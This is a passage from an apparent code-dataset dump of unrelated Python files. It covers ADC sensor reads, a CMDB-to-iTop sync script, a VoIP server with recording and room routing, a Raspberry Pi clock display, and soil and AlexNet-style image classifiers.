unittest.main()\n","sub_path":"tasks/task08/test_task08.py","file_name":"test_task08.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"338323682","text":"import numpy as np\nimport itertools\n\nXpts=[1.1, 2.01, 1.13, 1.6, 2.1, 2.5, 2.6, 2.7, 1.9, 0.5, 0.2, 0.3]\nYpts=[1.6, 2.1, 2.5, 2.6]\n\nPoints = np.array(list(itertools.product(Xpts, Ypts)))\nnp.save('data1.npy', Points)\narray_loaded = np.load('data1.npy')\nprint(array_loaded)","sub_path":"leetcode/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"112244129","text":"#MCP3008 PIN CONNECTIONS\n#CH0 - PCB Signal Line\n#VDD - 5V\n#VREF - 5V\n#AGND - GND\n#CLK - SCLK(GPIO 11)(HW 23)\n#DOUT - MISO(GPIO 9)(HW 21)\n#DIN - MOSI(GPIO 10)(HW 19)\n#CS - CE0(GPIO8)(HW 24)\n#DGND - GND\n\n#Test script to read values from the ADC\nimport time\nimport Adafruit_GPIO.SPI as SPI\nimport Adafruit_MCP3008\n\n#Allows us to test ADC read/SPI speed without much Python overhead\nfrom itertools import repeat\n\n#SPI Pin configuration\nSPI_PORT = 0\nSPI_DEVICE = 0\n\nmcp = Adafruit_MCP3008.MCP3008(spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE))\n\n\n\nprint(\"Ctrl-C to quit\")\nprint(\"Channel 0: \")\nstart_t = time.time()\nfor unused in repeat(None, 3200):\n del unused\n print(mcp.read_adc(0))\nend_t = time.time()\nprint(\"Execution time: %s seconds\" % (end_t - start_t))","sub_path":"dev/adc_hardwareSPI.py","file_name":"adc_hardwareSPI.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"83187969","text":"a=int(input('Digite um numero:'))\n\nsoma=0\nwhile a>=0:\n i=a//10\n r=a%10\n soma=soma+5\n a=a//10\nif soma==1:\n print('Numero feliz')\nelse:\n print('Numero Infeliz')","sub_path":"moodledata/vpl_data/59/usersdata/160/51004/submittedfiles/testes.py","file_name":"testes.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"288175939","text":"# base colors\nSTARTUP = (50, 50, 50)\nNEUTRAL = (0, 0, 0)\nOFF = (0, 0, 0)\n# color patterns\nSTREAM = [(128, 0, 255)]\nRECORD = [(255, 0, 0)]\nALL_OFF = [OFF]\n\nBRIGHTNESS = 0.1\n\n### Example using a 8-pixels RGBW neopixel stick\n# WHITE = const(0) # 128\n# STARTUP = (10, 10, 10, 0)\n# NEUTRAL = (0, 0, 0, 1)\n# OFF = (0, 0, 0, 0)\n# STREAM = [None] * 6 + [(128, 0, 255, WHITE)]\n# RECORD = [None] + [(255, 0, 0, WHITE)]\n# ALL_OFF = [OFF] * 8\n","sub_path":"examples/obs_remote_demo/obs_colors.py","file_name":"obs_colors.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"143298931","text":"from sqlalchemy import create_engine\nimport re\nfrom pandas import Series, DataFrame, concat\nimport pandas as pd\nfrom pymongo import MongoClient\nimport subprocess as t\nimport logging\nfrom logging.config import fileConfig\nimport configparser\n\nfileConfig('logger_config.ini')\nlogger=logging.getLogger('infoLogger')\n\nclass LoadAppsolution():\n\n def __init__(self):\n self.cfg = configparser.ConfigParser()\n self.cfg.read(\"config.ini\") \n cmdb_db = self.cfg.get(\"cmdb\",\"db\")\n cmdb_str = self.cfg.get(\"cmdb\",\"conn_str\")\n self.client = MongoClient(cmdb_str)\n self.db = self.client[cmdb_db]\n \n self.engine = create_engine(\n \"mysql+pymysql://root:Password1@127.0.0.1:3306/itop?charset=utf8\", encoding=\"utf-8\", echo=False)\n\n def load_to_itopdb(self, df, source_table_name):\n self.engine.execute(\"delete from %s\" % source_table_name)\n df.to_sql(source_table_name, con=self.engine,\n if_exists='append', index=False)\n\n def apply_by_php(self, source_table_name):\n source_table_id = source_table_name.split('_').pop()\n php_cmd = \"php -q /itop_data/http_dir/itop/synchro/synchro_exec.php --auth_user=%s --auth_pwd=%s --data_sources=%s\" % (\n 'admin', 'Password1', source_table_id)\n output = t.getoutput(php_cmd)\n logger.info(output + \"\\n\")\n\n def get_id(self, table_name):\n get_id_sql = \"select id,name from %s\" % (table_name)\n id_df = pd.read_sql(get_id_sql, con=self.engine)\n id_df['id'] = id_df['id'].map(lambda x: str(int(x)))\n return id_df\n\n def get_appsolution_src_df(self):\n appsolution_coll = self.db['merge_appsolution']\n appsolution_df = pd.DataFrame(list(appsolution_coll.find()))\n prefix = 'merge_'\n col_dict = {}\n for col in appsolution_df.columns:\n if prefix in col:\n col_dict[col] = col.split(prefix)[1]\n appsolution_src_df = appsolution_df.rename(columns=col_dict)[['environment','name']].assign(org_id=lambda x:1).assign(primary_key=lambda x:x['name'])\n # logger.info(appsolution_src_df.head(20))\n return appsolution_src_df\n\n def get_appsolution_src_df2(self):\n vm_coll = self.db['merge_virtualmachine']\n vm_df = pd.DataFrame(list(vm_coll.find()))\n appsolution_src_df = vm_df[['merge_env','merge_app']]\n appsolution_src_df=appsolution_src_df.rename(columns={\"merge_env\":\"environment\",\"merge_app\":\"name\"}).assign(org_id=lambda x:1).assign(primary_key=lambda x:x['name'])\n appsolution_src_df2=appsolution_src_df[appsolution_src_df.name!='']\n return appsolution_src_df2\n\n\n def main(self):\n appsolution_src_df = self.get_appsolution_src_df()\n self.load_to_itopdb(\n df=appsolution_src_df, source_table_name='synchro_data_applicationsolution_101')\n self.apply_by_php(source_table_name='synchro_data_applicationsolution_101')\n\n appsolution_src_df2 = self.get_appsolution_src_df2()\n self.load_to_itopdb(\n df=appsolution_src_df2, source_table_name='synchro_data_applicationsolution_101')\n self.apply_by_php(source_table_name='synchro_data_applicationsolution_101')\n\nif __name__ == '__main__':\n appsolution = LoadAppsolution()\n appsolution.main()\n","sub_path":"load_appsolution.py","file_name":"load_appsolution.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"456767844","text":"import threading\nimport struct\nimport time\nfrom socket import socket\n\nfrom .socket_controller import SocketController, SocketMode, KeyManager\nfrom .state_manager import StateManager\nfrom .recorder import Recorder\nfrom .opcodes import *\nfrom .config import *\nfrom . import loggers\nfrom . import history\n\n\nfrom .database.orm import DB, Primary\nfrom .database import Devices, GateConfig, CompConfig\n\n\nclass Server:\n def __init__(self) -> None:\n \"\"\"\n Create a new server instance.\n \"\"\"\n loggers.createFileLogger(__name__)\n\n self.log = loggers.getLogger(__name__ + '.' + self.__class__.__name__)\n\n # Create our local key manager\n self.km = KeyManager()\n\n # Create the 4 sockets the server will need to operate\n self.sock = SocketController(km=self.km)\n self.cont_sock = SocketController()\n self.udp_recv = SocketController(SocketMode.UDP, km=self.km)\n self.udp_send = SocketController(SocketMode.UDP, km=self.km)\n\n # Setup a state manager and bind it to the sockets\n self.sm = StateManager(self.sock, self.cont_sock, self.km)\n # Setup a recorder\n self.recorder = Recorder()\n\n # Bind all the sockets to their respective hosts and ports\n self.udp_recv.bind('', TCP_PORT)\n self.udp_recv.start()\n\n self.sock.bind(HOST, TCP_PORT)\n self.sock.listen(10)\n\n self.cont_sock.bind(HOST, CONTROL_PORT)\n self.cont_sock.listen(10)\n self.cont_udp_port = None\n\n self.sock.start()\n self.cont_sock.start()\n\n self.udp_lock = threading.Lock()\n self.udp_listeners = {}\n\n # Bind event hooks to the controller\n self.sock.tcp_lost_hook = self.tcp_lost\n self.sock.new_tcp_hook = self.new_tcp\n\n def tcp_lost(self, sock: socket, _) -> None:\n \"\"\"\n A handler that is bound to a socket controller, called when a TCP\n client disconnects. This function grabs the udp mutex, then clears out\n any now-unneeded state for that client.\n \"\"\"\n with self.udp_lock:\n client_id = self.km.id_from_sock(sock)\n if not client_id:\n # Not sure who this socket was, ignore them.\n return\n\n if client_id in self.udp_listeners:\n del self.udp_listeners[client_id]\n self.km.forget(client_id)\n\n # Log the event\n target_device = Devices.select(deviceID=client_id.decode('latin-1'))\n if target_device:\n history.insert(target_device, history.EVENT_DCON)\n\n # Inform the control surface a client has left.\n self.cont_sock.send_packet(CLIENT_LEAVE, client_id)\n\n def new_tcp(self, sock: socket, addr, client_id: bytes) -> None:\n \"\"\"\n A hook bound to socket controllers, called when a client completes\n their handshake. 
This function is responsible for saving and loading\n data from the database to retain state between sessions.\n \"\"\"\n # TODO: This!\n # This should be based off the pubkey.\n target_device = Devices.select(deviceID=client_id.decode('latin-1'))\n\n if not target_device:\n self.log.debug('Device not found in database.')\n # Create the audio config pair\n gate = GateConfig(*self.sm.gates[client_id])\n comp = CompConfig(*self.sm.compressors[client_id])\n # Insert them so they get identifiers\n GateConfig.insert(gate)\n CompConfig.insert(comp)\n\n # Create the core device config\n target_device = Devices(\n client_id.decode('latin-1'), \"\", addr[0],\n self.sm.names[client_id],\n False, gate, comp\n )\n\n # Register the device to the database\n Devices.insert(target_device)\n else:\n self.log.debug('Restoring device config from database.')\n # Restore all the configuation from the located device\n dev = target_device[0]\n self.sm.set_name(client_id, dev.name)\n\n self.sm.set_gate(\n client_id, (dev.gate.attack, dev.gate.hold,\n dev.gate.release, dev.gate.threshold)\n )\n self.sm.set_compressor(\n client_id, (dev.gate.attack, dev.gate.release,\n dev.gate.threshold)\n )\n \n # Log the event\n history.insert(target_device, history.EVENT_CONN)\n \n def udp_mainloop(self):\n \"\"\"\n The mainloop for UDP sections of the server. This handles mainly\n routing of audio between mutliple clients.\n \"\"\"\n while True:\n pkt = self.udp_recv.get_packet(True)\n self.log.debug(f'UDP packet from {pkt[1]}: {pkt[2].opcode}')\n if pkt[2].opcode == AUDIO:\n # Try feed the packet to the recorder. This may fail if there\n # is a disk IO failure, or if the audio payload is malformed.\n try:\n self.recorder.feed(pkt[2].client_id, pkt[2].payload)\n except Exception as e:\n self.log.warning(f'Failed to record audio for {pkt[2].client_id}: {e}')\n\n # Grab the UDP mutex for a short period\n with self.udp_lock:\n listeners = dict(self.udp_listeners)\n # Locate all the clients in the same room\n can_listen = set(sum([i for i in self.sm.rooms\n if pkt[2].client_id in i], []))\n # If a control surface is attached, forward the packet\n # there, too.\n if self.cont_udp_port is not None:\n can_listen.add(self.cont_udp_port)\n\n # Retransmit the audio to all clients allowed to listen.\n for i in can_listen:\n if pkt[2].client_id != i and i in listeners:\n self.udp_send.send_packet(\n AUDIO, pkt[2].payload, to=listeners[i],\n client_id=i, origin=pkt[2].client_id)\n\n def cont_mainloop(self):\n \"\"\"\n The mainloop responsible for interactions with the control surface.\n \"\"\"\n while True:\n pkt = self.cont_sock.get_packet(True)\n\n self.log.debug(f'CONT packet from {pkt[1]}: {pkt[2].opcode}')\n if pkt[2].opcode == SET_GATE:\n try:\n # Decode the parameters from the payload\n client_id = pkt[2].payload[:16]\n attack, hold, release, threshold, nonce = (\n struct.unpack('!4lH', pkt[2].payload[16:])\n )\n attack = max(0, min(65535, attack))\n hold = max(0, min(65535, hold))\n release = max(0, min(65535, release))\n threshold = max(0, min(65535, threshold))\n\n # Locate the targeted client\n sock = self.km.sock_from_id(client_id)\n if sock is not None:\n # Inform the client of the change\n self.sock.send_packet(\n SET_GATE,\n pkt[2].payload[16:],\n to=sock,\n client_id=client_id\n )\n # Update the state manager\n self.sm.set_gate(\n client_id, (attack, hold, release, threshold)\n )\n # Inform the control surface of the success state\n self.cont_sock.send_packet(\n SET_FAIL if sock is None else SET_ACK,\n struct.pack('!H', 
nonce), to=pkt[0])\n except struct.error:\n self.log.warning('Failed to decode CONT packet')\n elif pkt[2].opcode == SET_COMP:\n try:\n # Dedcode the parameters from the payload\n client_id = pkt[2].payload[:16]\n attack, release, threshold, nonce = (\n struct.unpack('!3lH', pkt[2].payload[16:])\n )\n attack = max(0, min(65535, attack))\n release = max(0, min(65535, release))\n threshold = max(0, min(65535, threshold))\n\n # Locate the targeted client\n sock = self.km.sock_from_id(client_id)\n if sock is not None:\n # Inform the client of the changes\n self.sock.send_packet(\n SET_COMP,\n pkt[2].payload[16:],\n to=sock,\n client_id=client_id\n )\n # Update the state manager\n self.sm.set_compressor(\n client_id,\n (attack, release, threshold)\n )\n # Inform the control surface of the success state\n self.cont_sock.send_packet(\n SET_FAIL if sock is None else SET_ACK,\n struct.pack('!H', nonce), to=pkt[0])\n except struct.error:\n self.log.warning('Failed to decode CONT packet')\n elif pkt[2].opcode == SET_NAME:\n # Extract the name from the payload\n client_id = pkt[2].payload[:16]\n # Update the state manager\n self.sm.set_name(\n client_id, pkt[2].payload[16:271].decode('latin-1')\n )\n elif pkt[2].opcode == SET_ROOMS:\n # Decode the list from the payload\n client_id = pkt[2].payload[:16]\n room_n = pkt[2].payload[16]\n rooms = pkt[2].payload[17: 17 + room_n]\n # Update the state manager\n self.sm.set_rooms(client_id, rooms)\n\n # Log the event\n target_device = Devices.select(deviceID=client_id.decode('latin-1'))\n if target_device:\n history.insert(target_device, history.EVENT_TEXT, 'Moved rooms')\n elif pkt[2].opcode == START_RECORD:\n # Decode the payload\n client_id = pkt[2].payload[:16]\n self.recorder.recording.add(client_id)\n self.recorder.rec_start[client_id] = time.time()\n\n # Log the event\n target_device = Devices.select(deviceID=client_id.decode('latin-1'))\n if target_device:\n history.insert(target_device, history.EVENT_TEXT, 'Recording started')\n elif pkt[2].opcode == STOP_RECORD:\n # Decode the payload\n client_id = pkt[2].payload[:16]\n if client_id in self.recorder.recording:\n # Stop recording the client\n self.recorder.recording.remove(client_id)\n if client_id in self.recorder.recordings:\n # Write any remaining buffer to disk\n self.recorder.recordings[client_id].flush()\n self.recorder.recordings[client_id].finish()\n # Clean up after the recorder\n del self.recorder.recordings[client_id]\n del self.recorder._decoders[client_id]\n del self.recorder._counts[client_id]\n \n # Log the event\n target_device = Devices.select(deviceID=client_id.decode('latin-1'))\n if target_device:\n history.insert(target_device, history.EVENT_TEXT, 'Recording stopped')\n elif pkt[2].opcode == GET_RECORD:\n # Decode the payload\n client_id = pkt[2].payload[:16]\n if client_id not in self.recorder.recording:\n # Send a dummy message\n self.cont_sock.send_packet(GET_RECORD, b'Not recording', to=pkt[0])\n else:\n # Convert seconds into a nicer format\n rec_len = time.time() - self.recorder.rec_start.get(client_id, time.time())\n ms = int(round(rec_len % 1, 3) * 1000)\n mi, se = divmod(int(rec_len), 60)\n hr, mi = divmod(mi, 60)\n dur = f'{hr:02}:{mi:02}:{se:02}.{ms:0<3}'.encode()\n # Respond to the client\n self.cont_sock.send_packet(GET_RECORD, b'Recording.. 
' + dur, to=pkt[0])\n elif pkt[2].opcode == REGISTER_UDP:\n # Register the UDP recieve port for the control surface.\n try:\n self.cont_udp_port = struct.unpack('!H', pkt[2].payload)[0]\n except struct.error:\n self.log.warning(\n 'Invalid packet when registering UDP port'\n )\n\n def mainloop(self):\n \"\"\"\n The mainloop for client TCP sockets. This is largely responsible for\n register UDP connections, as encryption is handler by socket\n controllers.\n \"\"\"\n threading.Thread(target=self.udp_mainloop, daemon=True).start()\n threading.Thread(target=self.cont_mainloop, daemon=True).start()\n\n while True:\n pkt = self.sock.get_packet(True)\n\n self.log.debug(f'TCP packet from {pkt[1]}: {pkt[2].opcode}')\n if pkt[2].opcode == REGISTER_UDP:\n # Attempt to decode the packet\n try:\n udp_port = struct.unpack('!H', pkt[2].payload)[0]\n\n self.udp_listeners[pkt[2].client_id] = (\n pkt[1][0], # Source IP\n udp_port\n )\n except struct.error:\n self.log.warning(\n 'Invalid packet when registering UDP port'\n )\n\n\nif __name__ == '__main__':\n Server().mainloop()\n","sub_path":"voiplib/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":14356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"54845797","text":"import time\nimport subprocess\nimport digitalio\nimport board\nfrom PIL import Image, ImageDraw, ImageFont\nimport adafruit_rgb_display.st7789 as st7789\nimport adafruit_rgb_display.ili9341 as ili9341\nimport adafruit_rgb_display.hx8357 as hx8357\nimport adafruit_rgb_display.st7735 as st7735\nimport adafruit_rgb_display.ssd1351 as ssd1351\nimport adafruit_rgb_display.ssd1331 as ssd1331 \n\n# Configuration for CS and DC pins (these are FeatherWing defaults on M0/M4):\ncs_pin = digitalio.DigitalInOut(board.CE0)\ndc_pin = digitalio.DigitalInOut(board.D25)\nreset_pin = digitalio.DigitalInOut(board.D24)\n\n# Config for display baudrate (default max is 24mhz):\nBAUDRATE = 24000000\n\n# Setup SPI bus using hardware SPI:\nspi = board.SPI()\n\n# Create the ST7789 display:\ndisp = st7789.ST7789(\n spi,\n cs=cs_pin,\n dc=dc_pin,\n rst=reset_pin,\n baudrate=BAUDRATE,\n width=135,\n height=240,\n x_offset=53,\n y_offset=40,\n)\n\n# setup for buttons\nbacklight = digitalio.DigitalInOut(board.D22)\nbacklight.switch_to_output()\nbacklight.value = True\nbuttonA = digitalio.DigitalInOut(board.D23)\nbuttonB = digitalio.DigitalInOut(board.D24)\nbuttonA.switch_to_input()\nbuttonB.switch_to_input()\n\n# Create blank image for drawing.\n# Make sure to create image with mode 'RGB' for full color.\nheight = disp.width # we swap height/width to rotate it to landscape!\nwidth = disp.height\nimage = Image.new(\"RGB\", (width, height))\nimage1 = Image.new(\"RGB\", (width, height))\nrotation = 90\n\n# Get drawing object to draw on image.\ndraw = ImageDraw.Draw(image)\ndraw1 = ImageDraw.Draw(image1)\n\n# Draw a black filled box to clear the image.\ndraw.rectangle((0, 0, width, height), outline=0, fill=(0, 0, 0))\ndraw1.rectangle((0,0,width,height),outline=0,fill=(0,0,0))\ndisp.image(image, rotation)\n\n# Draw some shapes.\n# First define some constants to allow easy resizing of shapes.\npadding = -2\ntop = padding\nbottom = height - padding\n# Move left to right keeping track of the current x position for drawing shapes.\nx = 0\n\nimage1 = Image.open(\"red.jpg\")\n\n# Scale image to smaller screen dimension\nimage_ratio = image.width / image.height\nscreen_ratio = width / height\nif screen_ratio < image_ratio:\n scaled_width = image.width * height // image.height\n scaled_height = height\nelse:\n scaled_width = width\n scaled_height = image.height * width // image.width\nimage1 = image1.resize((scaled_width, scaled_height), Image.BICUBIC)\n\n# Alternatively load a TTF font. Make sure the .ttf font file is in the\n# same directory as the python script!\n# Some other nice fonts to try: http://www.dafont.com/bitmap.php\nfont = ImageFont.truetype(\"/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf\", 18)\nfont1 = ImageFont.truetype(\"/usr/share/fonts/truetype/piboto/Piboto-Bold.ttf\", 22)\n\n# Turn on the backlight\nbacklight = digitalio.DigitalInOut(board.D22)\nbacklight.switch_to_output()\nbacklight.value = True\n\nstate = 0\nstate_timer = 0\nstart = time.time()\nwhile True:\n # Draw a black filled box to clear the image.\n draw.rectangle((0, 0, width, height), outline=0, fill=0)\n #draw1.rectangle((0,0,width,height),outline=0,fill=0)\n #TODO: fill in here. 
You should be able to look in cli_clock.py and stats.py\n # Display image.\n \n if buttonA.value and buttonB.value:\n backlight.value = False\n else:\n backlight.value = True\n \n if buttonB.value and not buttonA.value: # just button A pressed\n if state==0:\n clocktime = time.strftime(\"%A, %B %e, %Y\")\n draw.text((x,top), clocktime, font=font1, fill=\"#03cafc\")\n clocktime2 = time.strftime(\"%H:%M:%S\")\n y = top + font.getsize(clocktime)[1]\n draw.text((x, y), clocktime2, font=font1, fill=\"#1303fc\")\n disp.image(image, rotation)\n time.sleep(1)\n state = 1\n elif state==1:\n clocktime = time.strftime(\"%A, %B %e, %Y\")\n draw.text((x,top), clocktime, font=font1, fill=\"#03cafc\")\n clocktime2 = time.strftime(\"%I:%M:%S\")\n y = top + font.getsize(clocktime)[1]\n draw.text((x,y), clocktime2, font=font1, fill=\"#7703fc\")\n disp.image(image, rotation)\n time.sleep(1)\n state = 0\n\n if buttonA.value and not buttonB.value: # just button B pressed\n #draw1.rectangle((0,0,width,height),outline=0,fill=0)\n x1 = scaled_width // 2 - width // 2\n y1 = scaled_height // 2 - height // 2\n image1 = image1.crop((x1,y1,x1+width, y1+height))\n clear = image1.copy()\n draw1 = ImageDraw.Draw(clear)\n if state_timer == 0:\n txt = \"Start!\"\n draw1.text((10,5),txt, font=font1,fill=\"#7703fc\")\n start = time.time()\n disp.image(clear, rotation)\n time.sleep(1)\n state_timer = 1\n elif state_timer == 1:\n txt = \"End!\"\n draw1.text((10,5),txt, font=font1,fill=\"#7703fc\")\n end = time.time()\n y = 5+font1.getsize(txt)[1]\n result = round(end-start,2)\n draw1.text((10,y),str(result)+\" s\",font=font1,fill=\"#7703fc\")\n disp.image(clear, rotation)\n time.sleep(1)\n state_timer = 0\n\t\n","sub_path":"Lab 2/screen_clock.py","file_name":"screen_clock.py","file_ext":"py","file_size_in_byte":5190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"576944244","text":"print('start')\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom sklearn.model_selection import train_test_split \nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras.optimizers import RMSprop\nfrom scipy import stats\nimport tensorflow as tf\nimport numpy as np\nimport cv2\nimport os\nimport pathlib\nimport matplotlib.pyplot as plt\n\n\n# Vegetation removal as image preprocessing \n\n\ndata_dir='/workspace/storage/basedata/'\ndef get_list(a):\n\tcur_dir=os.path.join(data_dir,a)\n\tfilename = os.listdir(cur_dir)\n\tfor i in range(len(filename)):\n\t\tfilename[i]=os.path.join(cur_dir,filename[i])\n\treturn filename\n\n\n\n\na='alluvial/'\nb='black/'\nd='desert/'\nr='red/'\nf_img_arr=[]\nX=[]\nlabels=[]\nX = get_list(a)\nl=len(X)\nfor i in range(l):\n labels.append(0)\nX=X+get_list(b)\nl1=len(X)\nl=l1-l\nfor i in range(l):\n labels.append(1)\nl=l1\nX=X+get_list(d)\nl1=len(X)\nl=l1-l\nfor i in range(l):\n labels.append(2)\nl=l1\nX=X+get_list(r)\nl1=len(X)\nl=l1-l\nfor i in range(l):\n labels.append(3)\nl=l1\n\n#vegetation removl for all images individually\n# also used to print qualitative result\n\nno_of_loops=1\nacc=0\ntest_labels_before=[]\ntest_labels_after=[]\ntest_names=[]\nfor t in range(no_of_loops):\n\tX_train, X_test, y_train, y_test = train_test_split(X, labels, test_size = 0.2, random_state=42)\n\ttest_labels_before=y_test\n\ttest_names=X_test\n\n\n\tprint('train-test-split')\n\tprint(len(X_test))\n\n\n\n\n\tdef get_img(filename): \n\t\t\n\t\timg_array=[]\n\t\tfor i in range(0,len(filename)):\n\t\t\timg=cv2.imread(filename[i])\n\t\t\timg=cv2.resize(img,(1000,1000))\n\t\t\t# cur_img=cur_img.astype(np.float32)\n\t\t\t\n\t\t\theight, width, depth = img.shape\n\t\t\tmask = np.zeros((height, width), dtype = img.dtype)\n\n\t\t\tfor i in range(height) :\n\t\t\t\tfor j in range(width) :\n\t\t\t\t\tif(img[i][j][0] > 100\n\t\t\t\t\t\tand img[i][j][0] < 200\n\t\t\t\t\t\tand img[i][j][1] > 100\n\t\t\t\t\t\tand img[i][j][1] < 200\n\t\t\t\t\t\tand img[i][j][2] > 100\n\t\t\t\t\t\tand img[i][j][2] < 200) :\n\t\t\t\t\t\tmask[i][j] = 1\n\n\n\t\t\ttemp_img = cv2.bitwise_and(img, img, mask=mask)\n\t\t\ttemp_img=temp_img.astype(np.float32)\n\t\t\ttemp_img=temp_img/255\n\t\t\tif type(img_array)==list:\n\t\t\t\timg_array=np.array([temp_img])\n\t\t\telse:\n\t\t\t\timg_array=np.append(img_array,[temp_img],axis=0)\n\t\t\n\t\treturn img_array\n\n\n\n\n\tX_train= get_img(X_train)\n\n\n\n\tprint(X_train.shape)\n\n\tprint('absdiff calculated')\n\n\n\n\n\n\n\tonehot=[]\n\tfor value in y_train:\n\t\tletter = [0 for _ in range(4)]\n\t\tletter[value] = 1\n\t\tonehot.append(np.array(letter))\n\n\ty_train=np.array(onehot)\n\n\n\tprint('one-hot endoded')\n\n\n\tmodel = tf.keras.models.Sequential([\n\t\t\t\t\t\t\t\t\t\t\t# tf.keras.layers.experimental.preprocessing.Rescaling(1./255),\n\n\t\t\t\t\t\t\t\t\t\ttf.keras.layers.Conv2D(8,(15,15),activation='relu',input_shape=(1000,1000,3)),\n\t\t\t\t\t\t\t\t\t\ttf.keras.layers.MaxPool2D(4,4),\n\t\t\t\t\t\t\t\t\t\ttf.keras.layers.Conv2D(16,(15,15),activation='relu'),\n\t\t\t\t\t\t\t\t\t\ttf.keras.layers.MaxPool2D(4,4),\n\t\t\t\t\t\t\t\t\t\t# #\n\t\t\t\t\t\t\t\t\t\ttf.keras.layers.Conv2D(32,(15,15),activation='relu'),\n\t\t\t\t\t\t\t\t\t\ttf.keras.layers.MaxPool2D(4,4),\n\t\t\t\t\t\t\t\t\t\t# #\n\t\t\t\t\t\t\t\t\t\t# tf.keras.layers.Conv2D(64,(15,15),activation='relu'),\n\t\t\t\t\t\t\t\t\t\t# tf.keras.layers.MaxPool2D(4,4),\n\t\t\t\t\t\t\t\t\t\t# 
tf.keras.layers.Conv2D(128,(15,15),activation='relu'),\n\t\t\t\t\t\t\t\t\t\t# tf.keras.layers.MaxPool2D(4,4),\n\t\t\t\t\t\t\t\t\t\ttf.keras.layers.Flatten(),\n\t\t\t\t\t\t\t\t\t\ttf.keras.layers.Dense(256,activation='relu'),\n\t\t\t\t\t\t\t\t\t\ttf.keras.layers.Dense(4,activation='softmax')\n\t])\n\t# model.summary()\n\n\tmodel.compile(loss='categorical_crossentropy',\n\toptimizer=RMSprop(lr=0.001),\n\tmetrics=['accuracy'])\n\n\n\tmodel.summary()\n\n\tmodel.fit(\n\t\tx=X_train,\n\t\ty=y_train,\n\t\tvalidation_split=0.125,\n\t\t# validation_data=val_ds,\n\t\tsteps_per_epoch=10,\n\t\tepochs=10,\n\t)\n\n\tprint('model fitted')\n\n\n\n\tprint('testing starts')\n\n\t# model.predict(test_ds)\n\tres=[]\n\tfor i in range(len(X_test)):\n\t\timg=cv2.imread(X_test[i])\n\t\timg=cv2.resize(img,(1000,1000))\n\t\tarr=[]\n\t\theight, width, depth = img.shape\n\t\tmask = np.zeros((height, width), dtype = img.dtype)\n\n\t\tfor i in range(height) :\n\t\t\tfor j in range(width) :\n\t\t\t\tif( img[i][j][0] > 100\n\t\t\t\tand img[i][j][0] < 200\n\t\t\t\tand img[i][j][1] > 100\n\t\t\t\tand img[i][j][1] < 200\n\t\t\t\tand img[i][j][2] > 100\n\t\t\t\tand img[i][j][2] < 200) :\n\t\t\t\t\tmask[i][j] = 1\n\n\n\t\tarr = cv2.bitwise_and(img, img, mask=mask)\n\t\ttemp_res=model.predict(np.array([arr]))\n\t\ttemp2 = np.argmax(temp_res, axis=1)\n\t\tres.append(int(temp2))\n\ttest_labels_after=res\n\tk=0\n\tn=len(res)\n\tfor i in range(n):\n\t\tif res[i]==y_test[i]:\n\t\t\tk=k+1\n\tk=k/n\n\tprint('accuracy=',k)\n\tacc=acc+k\nacc=acc/no_of_loops\nprint('final accuracy=', acc)\n\nfor i in range(len(test_names)):\n\tprint(test_names[-44:],\"\t\t\",test_labels_before,\"\t\",test_labels_after)\n","sub_path":"Vegetation_removed_as_input_qualitative.py","file_name":"Vegetation_removed_as_input_qualitative.py","file_ext":"py","file_size_in_byte":4557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"98295552","text":"import tensorflow as tf\nimport init\nimport layers\n\ngraph = tf.get_default_graph()\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.9\nconfig.gpu_options.allow_growth = True\n\nX = tf.placeholder(tf.float32, [None, init.dict['col'], init.dict['row'], 3], name='input')\nY = tf.placeholder(tf.int32, [None], name='label')\nnum_classes = init.dict['num_classes']\n\n\n\nwith tf.variable_scope('CNN'):\n print('[X]:', X.get_shape().as_list())\n\n # [conv_1]\n layer1 = layers.conv_layer(X, 11, 4, 96, '1', padding='VALID', biases_value=0.0, **init.dict)\n relu1 = tf.nn.relu(layer1)\n print('[conv_1]:', relu1.get_shape().as_list())\n\n pool1 = layers.max_pool(relu1, 3, 2, padding='VALID')\n print('[pool_1]:', pool1.get_shape().as_list())\n\n # [conv_2]\n layer2 = layers.conv_layer(pool1, 5, 1, 256, '2', padding='SAME', biases_value=0.1, **init.dict)\n relu2 = tf.nn.relu(layer2)\n print('[conv_2]:', relu2.get_shape().as_list())\n\n pool2 = layers.max_pool(relu2, 3, 2, padding='VALID')\n print('[pool_2]:', pool2.get_shape().as_list())\n\n # [conv_3]\n layer3 = layers.conv_layer(pool2, 3, 1, 384, '3', padding='SAME', biases_value=0.0, **init.dict)\n relu3 = tf.nn.relu(layer3)\n print('[conv_3]:', relu3.get_shape().as_list())\n\n # [conv_4]\n layer4 = layers.conv_layer(relu3, 3, 1, 384, '4', padding='SAME', biases_value=0.0, **init.dict)\n relu4 = tf.nn.relu(layer4)\n print('[conv_4]:', relu4.get_shape().as_list())\n\n # [conv_5]\n layer5 = layers.conv_layer(relu4, 3, 1, 256, '5', padding='SAME', biases_value=0.1, **init.dict)\n relu5 = tf.nn.relu(layer5)\n print('[conv_5]:', relu5.get_shape().as_list())\n\n pool5 = layers.max_pool(relu5, 3, 2, padding='VALID')\n print('[pool_2]:', pool5.get_shape().as_list())\n\n # [fc_1]\n dropout_prob = 0.5\n fc1 = 